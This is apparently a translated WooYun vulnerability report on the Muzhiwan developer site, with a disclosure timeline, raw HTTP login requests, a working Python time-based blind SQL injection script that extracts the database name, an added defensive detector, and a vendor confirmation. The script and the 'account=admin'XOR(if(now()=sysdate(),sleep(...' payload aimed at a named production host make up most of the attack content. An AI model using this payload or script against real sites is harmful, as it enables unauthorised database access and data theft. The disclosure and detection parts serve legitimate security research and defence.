2016-01-04: Details reported to the vendor; awaiting vendor response
2016-01-05: Vendor confirmed; details disclosed to the vendor only
2016-01-15: Details disclosed to core white hats and relevant domain experts
2016-01-25: Details disclosed to regular white hats
2016-02-04: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public
(づ ̄ 3 ̄)づ
Same site as this earlier report: WooYun: 拇指玩一处SQL注入可控制千万用户数据 (a Muzhiwan SQL injection that could control tens of millions of user records)
POST /?action=public&opt=check_username HTTP/1.1
Host: open.muzhiwan.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://open.muzhiwan.com/?action=public&opt=login
Content-Length: 13
Cookie: PHPSESSID=86etm3velh28pgfdint4e3tvb2
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive

account=admin
The account parameter in the request above is filtered, but the account parameter in the POST below is not. ╮(╯▽╰)╭
POST /?action=public&opt=loginin HTTP/1.1
Host: open.muzhiwan.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://open.muzhiwan.com/?action=public&opt=login
Content-Length: 43
Cookie: PHPSESSID=86etm3velh28pgfdint4e3tvb2
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive

account=admin&password=111111111&remember=1
Script attached:
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Python 2 script as posted in the report (httplib, print statement).
import httplib
import time

headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print 'Starting to retrieve MySQL DB:'
db = ''
for i in range(1, 4):
    for payload in payloads:
        # Time-based blind probe: the response is delayed by 5 s only when the
        # guessed character matches position i of database().
        s = ("account=admin'XOR(if(now()=sysdate(),"
             "sleep(if(ascii(mid(database(),%s,1))=%s,5,0)),0))OR'"
             "&password=111111111&remember=1") % (i, ord(payload))
        conn = httplib.HTTPConnection('open.muzhiwan.com', timeout=60)
        conn.request(method='POST', url='/?action=public&opt=loginin',
                     body=s, headers=headers)
        start_time = time.time()
        conn.getresponse()
        conn.close()
        print '.',
        if time.time() - start_time > 5.0:
            db += payload
            print '\n\n[In progress]', db,
            break
print '\n\n[Done] MySQL DB is %s' % db
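Added example, not part of the report: a defender-side check that decodes a form body the way the login endpoint would and flags the primitives of the time-based blind injection shown above (quote break plus boolean operator, sleep(), the now()=sysdate() oracle, character-at-a-time extraction), escalating when the measured response time also matches the sleep delay. The sample bodies are constructed from the request in the report; the threshold and indicator names are assumptions.

```python
import re
import urllib.parse

# Constructed samples: the login body from the report (unfiltered account parameter),
# the same payload percent-encoded, and a benign login.
PAYLOAD = "admin'XOR(if(now()=sysdate(),sleep(if(ascii(mid(database(),1,1))=97,5,0)),0))OR'"
BLIND_SQLI_BODY = "account=" + PAYLOAD + "&password=111111111&remember=1"
ENCODED_BODY = "account=" + urllib.parse.quote(PAYLOAD, safe="") + "&password=111111111&remember=1"
BENIGN_BODY = "account=admin&password=111111111&remember=1"

# Primitives of the time-based blind technique in the report: a quote that closes the
# string literal followed by a boolean operator, a conditional delay, the
# now()=sysdate() timing oracle, and character-at-a-time extraction.
INDICATORS = {
    "quote_break": re.compile(r"'\s*(xor|or|and)\b", re.I),
    "delay_function": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "time_oracle": re.compile(r"\bnow\(\)\s*=\s*sysdate\(\)", re.I),
    "char_extraction": re.compile(r"\b(ascii|ord)\s*\(\s*(mid|substr|substring)\s*\(", re.I),
}

def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into {name: [values]}.
    Percent-encoding is undone here, so encoded payloads are inspected in the clear."""
    return urllib.parse.parse_qs(body, keep_blank_values=True)

def indicators_for(value):
    """Names of the injection primitives present in one parameter value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))

def inspect_body(body):
    """Map each parameter that carries any primitive to the sorted list found in it."""
    hits = {}
    for name, values in decode_form(body).items():
        found = sorted({ind for v in values for ind in indicators_for(v)})
        if found:
            hits[name] = found
    return hits

def classify(body, elapsed=None, delay_threshold=5.0):
    """'clean' when no primitive is present; 'sqli_suspected' when some are; and
    'blind_sqli_confirmed' when a delay function is present and the response took at
    least the sleep threshold, i.e. the injected sleep() actually executed."""
    hits = inspect_body(body)
    if not hits:
        return "clean"
    has_delay = any("delay_function" in found for found in hits.values())
    if has_delay and elapsed is not None and elapsed >= delay_threshold:
        return "blind_sqli_confirmed"
    return "sqli_suspected"

if __name__ == "__main__":
    for body, elapsed in [(BLIND_SQLI_BODY, 5.4), (ENCODED_BODY, 0.3), (BENIGN_BODY, 0.3)]:
        print(classify(body, elapsed), inspect_body(body))
```

Feed it the decoded POST body and the server-side response time from access logs; the "confirmed" tier is the one worth paging on, since the delay proves the injected expression ran.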
Filter the input.
Severity: High
Vulnerability Rank: 20
Confirmed: 2016-01-05 10:09
Hello, we will fix this as soon as possible.
None yet.